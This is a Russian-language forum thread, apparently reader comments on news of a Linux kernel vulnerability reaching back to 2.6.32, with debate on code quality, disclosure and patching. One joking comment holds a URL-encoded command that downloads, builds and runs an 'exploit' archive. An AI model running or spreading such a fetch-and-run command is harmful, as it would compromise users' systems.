| 1.11, emg81 (ok), 11:35, 06/06/2014 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– |
 А эксплоит-то есть, чтобы проверить, работает ли оно?
Просто у меня из всей массы "уязвимостей" работала только одна - последняя, связанная с tty write или типа того.
| | |
| |
| |
| |
| 4.118, KASRU (ok), 17:30, 25/06/2014 [^] [^^] [^^^] [ответить]
| –1 +/– |
 >> Надо замутить... :)
> Пля, работает, во срань!!!
Где скачать исходники exploit использующий эту уязвимость?
| | |
| |
| 5.119, arisu (ok), 18:18, 25/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
 ты поменьше павлину верь. вдобавок — ему и сплойтов никаких не надо, с его говнокодом.
| | |
|
|
|
| 2.28, Аноним (-), 13:38, 06/06/2014 [^] [^^] [^^^] [ответить]
| +10 +/– |
А я из 16 000+ зарегистрированных болезней, болел только поносом. Видимо пора закрывать больницы, друзья.
| | |
| |
| |
| 4.49, клоун (?), 16:37, 06/06/2014 [^] [^^] [^^^] [ответить]
| –1 +/– |
Понос - состояние, которое может быть вызвано не только болезнью, бестолочи.
| | |
| |
| 5.53, Michael Shigorin (ok), 17:03, 06/06/2014 [^] [^^] [^^^] [ответить]
| +5 +/– |
 > Понос - состояние, которое может быть вызвано не только болезнью, бестолочи.
А, так вот в чём Вы толк знаете...
| | |
| |
| 6.60, клоун (?), 17:38, 06/06/2014 [^] [^^] [^^^] [ответить]
| –3 +/– | |
Включай мозги! Нашёл на свалке просроченные продукты. Приготовил, сразу съел. Думал будет запор, но пронесло.
Симптомом какой болезни является понос и от чего тебя лечить?
| | |
| |
| 7.79, SubGun (ok), 22:42, 06/06/2014 [^] [^^] [^^^] [ответить]
| –1 +/– |
 > Симптомом какой болезни является понос и от чего тебя лечить?
Дизбактериоз.
| | |
| 7.81, Ivan (??), 23:07, 06/06/2014 [^] [^^] [^^^] [ответить]
| +1 +/– |
Мда... Простой вопрос: ПОЧЕМУ просроченные продукты вызывают понос? И вдогонку: что такое "болезнь"?
| | |
| 7.96, Аноним (-), 09:38, 07/06/2014 [^] [^^] [^^^] [ответить]
| +2 +/– | |
> будет запор, но пронесло.
Биологию ты чтоли не учил в своем дворце? Тебе про бактерий не рассказывали? Впрочем, рассказывать одноклеточному про одноклеточных - весьма сомнительное начинание.
> Симптомом какой болезни является понос и от чего тебя лечить?
Боюсь, root cause в виде непроходимой тyпости таки не лечится.
| | |
|
| 6.95, Аноним (-), 09:33, 07/06/2014 [^] [^^] [^^^] [ответить]
| +3 +/– | |
> А, так вот в чём Вы толк знаете...
Да, у него словесный. //off: иногда даже троллинг модератором посетителя - доставляет.
| | |
| |
| 7.102, Michael Shigorin (ok), 14:12, 07/06/2014 [^] [^^] [^^^] [ответить]
| –1 +/– | |
> Да, у него словесный.
Вообще справедливости ради, баланс чуши/флуда/вбросов к конструктиву, хоть и со своей спецификой, у данного посетителя меняется и это радует. Потому что пока есть смысл разговаривать, надо всячески стараться разглядеть человека и вытащить его, а не списывать всё в зверьё/насекомых/ботов и прочих унтерменшей. Проверено в жизни, да и "Крошка Енот" о том же.
| | |
|
|
|
|
|
|
| 1.12, Аноним (-), 11:37, 06/06/2014 [ответить] [﹢﹢﹢] [ · · · ]
| –10 +/– |
Что-то меня ядро Linux начало разочаровывать своими уязвимостями.
Для Fedora 20 вышло обновление ядра.
| | |
| |
| 2.29, Khariton (ok), 13:45, 06/06/2014 [^] [^^] [^^^] [ответить]
| +4 +/– |
 Вас разочаровывает тот факт, что нашли дырку еще с времен 2.6.32 или тот факт что если б не нашли, то типа никто и не знал бы и это было лучше?)))
Ошибки есть везде и лучше всего когда их могут залатать сразу а не через полгода или год.
Вот в линукс как раз с реализацией заплаток все более-менее быстро...
| | |
| |
| 3.47, Аноним (-), 16:33, 06/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
Разочаровывает, что ядро такое большое сложное немодульное и этого не изменить. (альтернатив на горизонте нету)
| | |
| |
| |
| 5.56, Аноним (-), 17:31, 06/06/2014 [^] [^^] [^^^] [ответить]
| –1 +/– |
>> Разочаровывает, что ядро такое большое сложное немодульное
> Вы хоть раз в него вообще заглядывали?
Нет, а ты?
| | |
| |
| |
| 7.86, arisu (ok), 01:46, 07/06/2014 [^] [^^] [^^^] [ответить]
| +1 +/– |
чёрт, буратино был тупой. сколько уж матом на это ругаюсь, а простая мысль взять и починить всё прямо там, где источник — не приходила.
| | |
|
|
| 5.62, Аноним (-), 17:52, 06/06/2014 [^] [^^] [^^^] [ответить]
| –2 +/– |
Да, и был поражен количеством легаси-гoвна, про которое мне пришлось долго, очень долго вспоминать в котором году я видел что-то подобное и видел ли вообще. Пора уже как в дровах на видео, делить код на части и выпихивать все гoвно мамонта в отдельную ветку. И не только в ядре, многие программы грешат этим. Почему из-за полутора некрофилов должны страдать все? Если кто уж так привязан к железкам/технологиям 90-х годов, вот пускай сами и пиляют их в отдельной ветке.
| | |
| |
| 6.68, Deffic (?), 20:48, 06/06/2014 [^] [^^] [^^^] [ответить]
| +3 +/– |
> Да, и был поражен количеством легаси-гoвна, про которое мне пришлось долго, очень
> долго вспоминать в котором году я видел что-то подобное и видел
> ли вообще. Пора уже как в дровах на видео, делить код
> на части и выпихивать все гoвно мамонта в отдельную ветку. И
> не только в ядре, многие программы грешат этим. Почему из-за полутора
> некрофилов должны страдать все? Если кто уж так привязан к железкам/технологиям
> 90-х годов, вот пускай сами и пиляют их в отдельной ветке.
Пострадали только Вы.
| | |
| 6.77, Аноним (-), 21:48, 06/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
Оно и пилится в отдельных ветках по факту, а потом уже мерджится.
Вон у поттеринга такой же способ разработки systemd.
| | |
|
|
| 4.97, Аноним (-), 09:40, 07/06/2014 [^] [^^] [^^^] [ответить]
| +2 +/– | |
> сложное немодульное и этого не изменить.
Попробуй посмотреть как его разрабатывают чтоли, эксперт хренов. Заодно узнай что такое pull request-ы и по каким принципам их делают.
| | |
|
|
| 2.31, Аноним (-), 14:01, 06/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
Во второй половине двухтысячных в Firefox выявлялось больше уязвимостей, чем в IE. Означает ли это, что качество кода Firefox было ниже? Парадоксально, это означает обратное.
| | |
| |
| 3.38, клоун (?), 14:54, 06/06/2014 [^] [^^] [^^^] [ответить]
| –1 +/– | |
Это ничего не означает.
А измеримое понятие "качество кода" само по себе нуждается в чётком термине, которого не существует.
| | |
| |
| 4.98, Аноним (-), 09:41, 07/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
> А измеримое понятие "качество кода" само по себе нуждается в чётком термине,
> которого не существует.
Почему же? Количество багов на тысячу строк - очень даже измеримая сущность с вполне четким определением.
| | |
| |
| 5.99, Andrey Mitrofanov (?), 12:51, 07/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
>> А измеримое понятие "качество кода" само по себе нуждается
> Почему же? Количество багов на тысячу строк - очень даже измеримая сущность
> с вполне четким определением.
А мифическое "качество кода" не измеряется и не определимо чётко. Попытка подмены не засчитана. Вторая подача?
| | |
| 5.101, Michael Shigorin (ok), 14:05, 07/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
>> А измеримое понятие "качество кода" само по себе нуждается в чётком термине,
>> которого не существует.
Не термине, а определении, но да.
> Почему же? Количество багов на тысячу строк - очень даже измеримая сущность
> с вполне четким определением.
Баг багу рознь.
| | |
|
|
|
|
| 1.14, vitalif (ok), 11:46, 06/06/2014 [ответить] [﹢﹢﹢] [ · · · ]
| +5 +/– |
 Хорошо, больше рута для ондроидов. А то когдаа безопасность ДЛЯ пользователя, это хорошо, но вот когда против - лучше решето)
| | |
| |
| |
| |
| 4.36, Аноним (-), 14:35, 06/06/2014 [^] [^^] [^^^] [ответить]
| +2 +/– | |
http%3A%2F%2Fremotehost.example.com%2F%3Fwget+www.hackers.org%2Fexploit.zip%26%26unzip+-x+exploit.zip%26%26make%26%26make+install%26%26%2Fusr%2Fbin%2Fexploit
мамо, чому я румынскiй вiрус?
| | |
|
|
|
| |
| |
| 3.45, Аноним (-), 16:30, 06/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
Подтверждаю. Даже для бекпортированной 3.14 - linux-image-3.14-0.bpo.1-amd64 amd64 3.14.5-1~bpo70+1
| | |
|
|
| 1.19, Sergey722 (ok), 12:20, 06/06/2014 [ответить] [﹢﹢﹢] [ · · · ]
| +2 +/– |
 Новость позитивная! Если уязвимость не найдена, то это не значит, что её нет, более того это значит только то, что она не найдена хорошими парнями. А найденная уязвимость - это и не уязвимость вовсе!
| | |
| |
| 2.20, lucentcode (ok), 12:35, 06/06/2014 [^] [^^] [^^^] [ответить]
| –2 +/– |
 Совершенно верно. Новость позитивная. Баги были есть и будут всегда. Главное что-бы их вовремя находили.
| | |
| |
| 3.24, Аноним (-), 13:32, 06/06/2014 [^] [^^] [^^^] [ответить]
| +1 +/– | |
>все актуальные выпуски ядра, включая 2.6.32
от 2010 года
>что-бы их вовремя находили.
Да, "вовремя"
| | |
| 3.41, umbr (ok), 15:39, 06/06/2014 [^] [^^] [^^^] [ответить]
| –1 +/– |
 Больше багов, хороших и разных!
Извините за оффтоп :)
| | |
|
| 2.21, Michael Shigorin (ok), 13:03, 06/06/2014 [^] [^^] [^^^] [ответить]
| –2 +/– | |
> А найденная уязвимость - это и не уязвимость вовсе!
Вообще-то найденная уязвимость -- это найденная уязвимость. Её ещё надо разобрать, заткнуть, проверить на отсутствие регрессий (или их приемлемость, когда вилка), а затем самое интересное: выкатить исправление на местах, где найденная в коде уязвимость остаётся уязвимостью хоста.
| | |
| |
| 3.27, Аноним (-), 13:36, 06/06/2014 [^] [^^] [^^^] [ответить]
| –3 +/– |
Вы пропустили важный пункт - 3) наказать того кто пропустил уязвимость, потом того кто принял патч с ней в ядро.
| | |
| |
| 4.71, Ytch (ok), 21:07, 06/06/2014 [^] [^^] [^^^] [ответить]
| +1 +/– |
 > наказать того кто пропустил уязвимость, потом того кто принял патч с ней в ядро.
типичный корпоративный путь в пропасть. насмотрелся. надо описывать в деталях к чему приводит и как сказывается на качестве в итоге?
| | |
| 4.94, Аноним (-), 09:32, 07/06/2014 [^] [^^] [^^^] [ответить]
| +/– | |
> наказать того кто пропустил уязвимость,
Людям свойственно ошибаться. Наказывать человека за то что он человек? Хм, удачи вам в поиске сотрудников в вашу шарагу...
| | |
|
|
|
| 1.44, Аноним (-), 16:18, 06/06/2014 [ответить] [﹢﹢﹢] [ · · · ]
| –1 +/– |
И эти самые корпорации, не способные обезопасить ядро собираются улучшать разработку OpenSSL?
| | |
| 1.64, Аноним (-), 19:16, 06/06/2014 [ответить] [﹢﹢﹢] [ · · · ]
| –2 +/– |
Прозвучали различные мнение о том, что лучше. Любой софт "дырявый". Из этого следует, что лучше путь о них никто не знает. Полагаю это самый разумный компромисс. Нельзя устранить все ошибки и довести продукт до идеала. До нужного состояния и не более того. А всяким "кодокопателям" нужно по рукам бить чтобы другие не страдали из за их энтузиазма. И тем более сурово карать за публикацию в открытый доступ. Палка с двумя концами. Хотели как лучше, а вышло как всегда...
| | |
| |
| 2.69, Аноним (-), 21:03, 06/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
Ты не думал что в твоем комментарии логическое противоречии? Если все ошибки трудно устранить, то с тем же успехом их трудно искать.
| | |
| |
| 3.106, Аноним (-), 22:48, 07/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
>> Нельзя устранить все ошибки и довести продукт до идеала.
> Нет.
Нет
| | |
| |
| 4.107, Michael Shigorin (ok), 23:28, 07/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
>>> Нельзя устранить все ошибки и довести продукт до идеала.
>> Нет.
> Нет
Нет смысла повторять эхом, тем паче когда примеры известны.
| | |
| |
| |
| |
| 7.113, Аноним (-), 21:56, 14/06/2014 [^] [^^] [^^^] [ответить]
| –1 +/– | |
> запросто: TeX.
Ага, шикарный пример, которым пользуются целых два с половиной землемера. И на этом список заканчивается. Арису, такой Арису...
| | |
|
| 6.112, Michael Shigorin (ok), 01:27, 10/06/2014 [^] [^^] [^^^] [ответить]
| +/– | |
> Примеры в студию, кроме Альта разумеется.
Альт как раз в таком качестве не годится (как и любая известная мне ОС), а отдельные подозрительные на примерность кусочки вроде control(8) погоды всё-таки не делают. TeX и изделия DJB уже назвали, этого уже достаточно.
| | |
|
|
|
|
| 2.93, Аноним (-), 09:23, 07/06/2014 [^] [^^] [^^^] [ответить] | +/– | DJB делом доказал в qmail и djbdns что это не так Неверный вывод из неверных пр... большой текст свёрнут, показать | | |
| |
| 3.104, Michael Shigorin (ok), 14:19, 07/06/2014 [^] [^^] [^^^] [ответить]
| +/– | |
> Есть только 1 способ удавить баги - выловить и починить.
Отнюдь. И вообще-то пример с DJB и другими сторонниками подхода proactive security -- это как раз иллюстрация обратного: "чисто не там, где убирают, а там, где не гадят". Хотя для индустрии этот подход и впрямь менее понятен -- потому как нужны высококлассные специалисты, а не взаимозаменяемые "менеджеры безопасности" (не в упрёк высококлассным специалистам среди менеджеров, ну да они и так поймут, даже если наткнутся на эти слова).
| | |
| |
| 4.121, Аноним (-), 19:27, 25/06/2014 [^] [^^] [^^^] [ответить]
| +/– |
> Отнюдь. И вообще-то пример с DJB и другими сторонниками подхода proactive
> security -- это как раз иллюстрация обратного:
Да, тут есть в новой новости иллюстрация - там где про секурный L4. Если ядро ничего не умеет - то и багов в нем нет. Это, конечно, логично, но... если чуть продолжить эту мысль, можно немного повысить безопасность, отключив питание компьютера. К сожалению, это несколько понижает полезность компьютера. Ну вот и грызут небезопасные кактусы...
| | |
|
|
|
| |
| 2.74, Мистер Икс (?), 21:17, 06/06/2014 [^] [^^] [^^^] [ответить]
| +/– | |
> Что-то они зачастили в последнее время.
Когда действуют в опережение, в этом нет ничего плохого. Хуже, когда все шито-крыто.
Хорошо вот, что openssl открытая, а то никогда бы ничего не нашли, а разработчики торговали бы уязвимостями. Настанет время и линукс наш любимый станет использоваться во всем мире, а ошибки будут находить в миллион раз быстрее, никто не успеет их использовать.
| | |
|
| 1.110, Аноним (-), 10:14, 09/06/2014 [ответить] [﹢﹢﹢] [ · · · ]
| –1 +/– | |
После установки свежего обновления ядра в Ubuntu перестали запускаться куча программ, по strace стопорится на
futex(0xb83e0160, FUTEX_UNLOCK_PI_PRIVATE, 1318900) = -1 EPERM (Operation not permitted)
futex(0xb83d6e74, FUTEX_WAIT_PRIVATE, 1, NULL
| | |
|
